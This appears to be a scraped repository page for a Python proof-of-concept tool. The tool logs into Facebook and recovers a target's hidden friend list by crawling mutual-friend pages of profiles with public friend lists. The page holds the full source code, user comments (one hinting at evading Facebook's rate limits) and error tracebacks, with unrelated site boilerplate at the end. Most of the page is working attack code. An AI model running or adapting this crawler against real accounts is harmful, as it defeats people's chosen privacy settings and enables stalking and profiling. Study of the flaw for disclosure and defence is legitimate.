Facebook hidden friends crawler POC
Facebook hidden friends crawler POC - By Shay Priel
A POC for Facebook Hidden Friends Vulnerability
Disclaimer: This tool is POC for educational purposes only
Installation:
You will need: apt-get install python-lxml
pip install selenium
pip install requests
pip install colorama
Note: Tested on ubuntu only
For example :
python fb-hfc.py -username someone -password somepasswd -target zuck -profilesfile related_profiles.txt -output report.txt
This does not work. Because what should be there in the related_profiles.txt is unknown at this point. Please provide a usage documentation so other contributors can quickly improve it
So first of all nice work.
Me and a friend have created such a tool just a couple months ago so thats cool.
But i noticed you did't overcome the statistical blocking that facebook secures the graph search..
Did you notice that after a couple hundred search requests your user stops getting results? or did this only happen to us?
(PS: We have a half-baked way to overcome this problem)
A license would make it much easier for developers to fork this and packagers to include it in repositories like Kali or Arch Assault- Thanks!
I've spent hours trying to get this program to work in vain. Firstly, Facebook has phased out graph search - so the query field is impossible to satisfy, and secondly, there is an issue with the related_profiles .txt file - this refers to a non-existent txt file? Was it intended that the query generate this file, before crawling for a target? Well, as I pointed out, query is now obsolete as Facebook has phased out graph search. I'd really like the creator to please review and update the program as necessary. It's a fine concept, it's a pity its not in working state despite many devoted users' efforts to troubleshoot it. Also clear documentation would really enhance useability. Please, please, please, we love your program, please make it work!
#!/usr/bin/env python
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from StringIO import StringIO
from colorama import init
from colorama import Fore, Back, Style
from pyvirtualdisplay import Display
import lxml.html
import time
import re
import requests
import argparse
import sys
import os.path
init(autoreset=True)
print "-----------------------------------------------------------------------------"
print " Facebook hidden friends crawler POC - by Shay Priel"
print "-----------------------------------------------------------------------------"
print Fore.BLACK + Style.BRIGHT + " .@@@@." + Fore.RESET + " .:::, :;:: "
print Fore.BLACK + Style.BRIGHT + " lCCCf; .@@@@. " + Fore.RESET + ".:::, :::: "
print Fore.BLACK + Style.BRIGHT + " C@@@@@@t lLLL, tLLL,@@@@iCGL: :fGGGf, fLLf:CGf" + Fore.RESET + "..:::,.,,,.,::. :::: "
print Fore.BLACK + Style.BRIGHT + "i@@@@@@@@,l@@@; G@@@.@@@@@@@@@, ;@@@@@@@: G@@@@@@@C" + Fore.RESET + ".:::,,::::::::..::::, "
print Fore.BLACK + Style.BRIGHT + "C@@@C@@@@l;@@@l G@@C.@@@@@@@@@t.@@@@@@@@g.@@@@@@@@@" + Fore.RESET + ".:::,,::::::::,.::::, "
print Fore.BLACK + Style.BRIGHT + "@@@@.i@@@l.@@@f @@@l.@@@@ii@@@C;@@@C.G@@@,@@@@;@@@@" + Fore.RESET + ".:::,,:::, ::::.::::, "
print Fore.BLACK + Style.BRIGHT + "@@@@ ;@@@l G@@l.@@@t.@@@@.,@@@ci@@@l L@@@,@@@g G@@@" + Fore.RESET + ".:::,,:::. ,::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@ ;@@@l L@@C,@@@;.@@@@.,@@@gi@@@i f@@@,@@@g G@@@" + Fore.RESET + ".:::,,::: ,::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@ ,,,. t@@g;@@@..@@@@.,@@@ci@@@cfg@@@,@@@g G@@@" + Fore.RESET + ".:::,,::: :::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@ i@@gl@@g .@@@@.,@@@ci@@@@@@@@@,@@@g G@@@" + Fore.RESET + ".:::,,::: :::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@ . :@@@f@@l .@@@@.,@@@ci@@@@ggggg,@@@g ....." + Fore.RESET + ":::,,::: :::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@ ;@@@t .@@@g@@t .@@@@.,@@@ci@@@l @@@g " + Fore.RESET + ".:::,,::: :::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@ ;@@@f G@@@@@i .@@@@.,@@@ci@@@l fGGG,@@@g " + Fore.RESET + ".:::,,::: :::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@ ;@@@f L@@@@@: .@@@@.,@@@ci@@@l f@@@,@@@g " + Fore.RESET + ".:::,,::: :::: :::: "
print Fore.BLACK + Style.BRIGHT + "@@@@,i@@@f l@@@@@. .@@@@,,@@@ci@@@t C@@@,@@@g " + Fore.RESET + ".:::,,::: :::: :::: "
print Fore.BLACK + Style.BRIGHT + "G@@@g@@@@l ;@@@@C .@@@@ll@@@l:@@@@t@@@@,@@@g " + Fore.RESET + ".:::,,::: :::: ::::"+ Fore.RED +"lilll. "
print Fore.BLACK + Style.BRIGHT + "i@@@@@@@@. ,@@@@f .@@@@@@@@@i C@@@@@@@l.@@@g " + Fore.RESET + " :::,,:::. :::: ::::"+ Fore.RED +"llttt. "
print Fore.BLACK + Style.BRIGHT + "t@@@@@@i .;@@@@i .@@@@f@@@C ,G@@@@@C @@@g " + Fore.RESET + ".:::.,::: ,::: .:::,"+ Fore.RED +"ltttl. "
print "-----------------------------------------------------------------------------"
print "Examples:"
print "1. Generates related public profiles:"
print "python fb-hfc.py -username -password '' \n-query '' -output <output.txt>"
print "2. Exctracting hidden friends:"
print "python fb-hfc.py -username -password '' \n-target -profilesfile <file.txt> -output <output.txt>"
print "-----------------------------------------------------------------------------"
parser = argparse.ArgumentParser(usage="-h for full usage")
parser.add_argument('-username', dest="username", help='facebook username to login with (e.g. [email protected])',required=True)
parser.add_argument('-password', dest="password", help='facebook password to login with (e.g. 'password')',required=True)
parser.add_argument('-query', dest="query", help='graph search query (e.g. "People That Work in Company")',required=False)
parser.add_argument('-output', dest="output", help='File name to save results',required=False)
parser.add_argument('-target', dest="target", help='(e.g. "text.example")',required=False)
parser.add_argument('-profilesfile', dest="profilesfile", help='File name that contains list of profiles with public friends',required=False)
args = parser.parse_args()
if args.query is None and args.target is None:
parser.error("You must give atleast one method -query or -target")
if args.query and args.target:
parser.error("-query and -target cannot run together")
if args.target and args.profilesfile is None:
parser.error("You must provide -profilesfile")
if args.query and args.profilesfile:
parser.error("-query and -profilesfile cannot run together")
if args.query and args.output is None:
parser.error("You must provide -output")
if args.target and args.output is None:
parser.error("You must provide -output")
def facebook_login(username,password):
print ("\n\n\nLogin to Facebook...."),
sys.stdout.flush()
url = "http://www.facebook.com"
driver.get(url)
elem = driver.find_element_by_id("email")
elem.send_keys(username)
elem = driver.find_element_by_id("pass")
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
time.sleep(1)
html_source = driver.page_source
if "Please re-enter your password" in html_source or "Incorrect Email" in html_source:
print Fore.RED + "Incorrect Username or Password"
driver.close()
exit()
else:
print Fore.GREEN + "Success\n"
return driver.get_cookies()
def request_url(url,get_cookies):
all_cookies = dict()
for cookie in get_cookies:
all_cookies[cookie["name"]]=cookie["value"]
r = requests.get(url,cookies=all_cookies)
html = r.content
return html
def graph_search(graph_search_query):
print ("Searching for: "" + Fore.YELLOW + graph_search_query + Fore.RESET + ""..."),
sys.stdout.flush()
driver.implicitly_wait(5)
time.sleep(1)
elem = driver.find_element_by_xpath("//div[@Class='_586i']")
elem.click()
elem.send_keys(graph_search_query)
elem.send_keys(Keys.RETURN)
print Fore.GREEN + "Done\n"
def extract_profiles():
while True:
time.sleep(1)
try:
elem = driver.find_element_by_xpath(".//th[@class='_4311']")
except:
print "Invalid graph search query! (hint: first try it on facebook)"
driver.close()
exit()
try:
print "Extracting Profiles...\n"
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
elem = driver.find_element_by_xpath("//div[@class='phm _64f']")
if "End of results" in elem.text:
break
except:
pass
xpath_name_params = ".//a[@class='_7kf _8o _8s lfloat _ohe']/@href"
html_source = driver.page_source
html_lxml = lxml.html.parse(StringIO(html_source)) #parse to lxml object
params_result = html_lxml.xpath(xpath_name_params)
data = list()
for prm in params_result:
if "profile.php" in prm:
result = re.search('(?<=\profile\.php\?id=)(.*\n?)(?=&ref)', prm)
data.append(result.group())
else:
result = re.search('(?<=\.com\/)(.*\n?)(?=\?)', prm)
data.append(result.group())
print "Enumerating %s profiles...\n" % len(data)
return data
def extract_mutual_friends(profiles_urls):
print "Enumerating hidden friends from: " + Fore.YELLOW + target + "\n"
data = list()
for profile_url in profiles_urls:
elem = driver.get(profile_url)
print "Enumerating mutual friends: %s" % profile_url
while True:
time.sleep(2)
try:
elem = driver.find_element_by_xpath(".//a[@class='pam uiBoxLightblue uiMorePagerPrimary']")
elem.click()
except:
break
xpath_name_params = ".//div[@class='fsl fwb fcb']/a/@href"
xpath_name_params2 = ".//div[@class='fsl fwb fcb']/a/text()"
html_source = driver.page_source
html_lxml = lxml.html.parse(StringIO(html_source)) #parse to lxml object
params_result = html_lxml.xpath(xpath_name_params)
params_result2 = html_lxml.xpath(xpath_name_params2)
for prm,prm2 in zip(params_result,params_result2):
if "profile.php" in prm:
result = re.search('(?<=\profile\.php\?id=)(.*\n?)(?=&fref=pb_other)', prm)
if result.group() not in data:
data.append(result.group())
if prm2 not in data:
data.append(prm2)
else:
result = re.search('(?<=\.com\/)(.*\n?)(?=\?)', prm)
if result.group() not in data:
data.append(result.group())
if prm2 not in data:
data.append(prm2)
print Fore.GREEN + "\nTotal of %s hidden friends have been found\n" % str(len(data))
return data
def check_if_public(profiles,cookies):
print "Searching for public profiles...\n"
xpath_name_params = ".//a[@id='u_0_1i']/span[@Class='_3sz']/text()"
public_profile = list()
digits = re.compile('\d')
for profile in profiles:
if profile.isdigit():
profile_url = "https://www.facebook.com/profile.php?id=%s&sk=friends" % profile
print("Checking Profile: %s......" % profile),
sys.stdout.flush()
else:
profile_url = "https://www.facebook.com/%s/friends" % profile
print("Checking Profile: %s......" % profile),
sys.stdout.flush()
html = request_url(profile_url,cookies)
if "All Friends" in html:
public_profile.append(profile)
print Fore.GREEN + "Public"
else:
print Fore.RED + "None Public"
print "\nTotal of %s public profiles have been found\n" % str(len(public_profile))
return set(public_profile)
def generate_mutual_link(profilesfile,target):
mutual_url = list()
for profile in profilesfile:
mutual_url.append("https://www.facebook.com/%s/friends?and=%s" % (target,profile))
return mutual_url
def open_file(filename):
results = list()
with open(filename, 'r') as myFile:
for line in myFile.readlines():
results.append(line.strip())
return results
def save_file(filename,results):
if args.profilesfile:
line_items = 2
with open(filename, 'w') as myFile:
for n, user in enumerate(results):
if (n+1) % line_items:
if user.isdigit():
profile_url = "https://www.facebook.com/profile.php?id=%s" % user
else:
profile_url = "https://www.facebook.com/%s" % user
myFile.write("Username: " + user.encode('utf8')+"\n")
else:
myFile.write("Full Name: " + user.encode('utf8')+"\n"+"Link to Profile: " + profile_url.encode('utf8')+"\n\n")
else:
with open(filename, 'w') as myFile:
for user in results:
myFile.write(user.encode('utf8')+"\n")
print "Saving results to: %s\n\n" % filename
target = args.target
username = args.username
password = args.password
filename = args.output
graph_search_query = args.query
profilesfile = args.profilesfile
if args.target and args.profilesfile:
if not os.path.isfile(profilesfile):
print profilesfile +" file doesn't exist"
exit()
display = Display(visible=0, size=(1600, 900))
display.start()
driver = webdriver.Firefox()
cookies = dict()
cookies = facebook_login(username,password)
if args.query:
graph_search(graph_search_query)
results = extract_profiles()
results = check_if_public(results,cookies)
save_file(filename,results)
driver.close()
exit()
if args.target:
profiles = open_file(profilesfile)
results = generate_mutual_link(profiles,target)
results = extract_mutual_friends(results)
save_file(filename,results)
driver.close()
exit()
..the searched strings inside the html are missed.
It seems, there are differences between the languages. So I use german facebook.
The basic idea is good, but I played 8 hours with the code and it does not work :(
But it is also my first contact to python. So I not really understand, what fields at the fb-html you inspect for collection data (login is easy. Then you use the Search at the top? Why you does not use "find_element_by_id" ?)
Maybe there is a problem with the python for windows what I using?
I have no "atp-get" here, so I installed lxml from here: http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml
Look at this error from console:
Login to Facebook.... Success
Searching for: "People That Work in Company"...
Traceback (most recent call last):
File "fb-hfc.py", line 303, in
graph_search(graph_search_query)
File "fb-hfc.py", line 118, in graph_search
elem = driver.find_element_by_xpath("//div[@Class='_586i']")
File "Z:\Python27\lib\site-packages\selenium\webdriver\remote\webdriver.py", l
ine 230, in find_element_by_xpath
return self.find_element(by=By.XPATH, value=xpath)
File "Z:\Python27\lib\site-packages\selenium\webdriver\remote\webdriver.py", l
ine 662, in find_element
{'using': by, 'value': value})['value']
File "Z:\Python27\lib\site-packages\selenium\webdriver\remote\webdriver.py", l
ine 173, in execute
self.error_handler.check_response(response)
File "Z:\Python27\lib\site-packages\selenium\webdriver\remote\errorhandler.py"
, line 164, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.NoSuchElementException: Message: u'Unable to locate e
lement: {"method":"xpath","selector":"//div[@Class='586i']"}' ; Stacktrace:
at FirefoxDriver.prototype.findElementInternal (file:///c:/users/mathe/appd
ata/local/temp/tmpiqfwzp/extensions/[email protected]/components/driver_co
mponent.js:9470:7)
at fxdriver.Timer.prototype.setTimeout/<.notify (file:///c:/users/mathe/appd
ata/local/temp/tmpiqfwzp/extensions/[email protected]/components/driver_co
mponent.js:407:5)
A manual search in html for '_586i' failed. This string missed. So the script failed.
Also I tried with Chrome-webdriver. Same.
And I tried different Queries. No way.
/mathe
Login to Facebook.... Success
Searching for: "Meaningoflife"...
Traceback (most recent call last):
File "fb-hfc.py", line 301, in
graph_search(graph_search_query)
File "fb-hfc.py", line 117, in graph_search
elem.click()
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webelement.py", line 60, in click
self._execute(Command.CLICK_ELEMENT)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webelement.py", line 370, in execute
return self.parent.execute(command, params)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webdriver.py", line 173, in execute
self.error_handler.check_response(response)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/errorhandler.py", line 164, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.MoveTargetOutOfBoundsException: Message: u'Element cannot be scrolled into view:[object XrayWrapper [object HTMLDivElement]]' ; Stacktrace:
at WebElement.clickElement (file:///tmp/tmp8_B3UJ/extensions/[email protected]/components/command_processor.js:10864)
at DelayedCommand.prototype.executeInternal/h (file:///tmp/tmp8_B3UJ/extensions/[email protected]/components/command_processor.js:11455)
at DelayedCommand.prototype.executeInternal (file:///tmp/tmp8_B3UJ/extensions/[email protected]/components/command_processor.js:11460)
at DelayedCommand.prototype.execute/< (file:///tmp/tmp8_B3UJ/extensions/[email protected]/components/command_processor.js:11402)
Doesn't work when Fb checkpoint has been activated before...
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.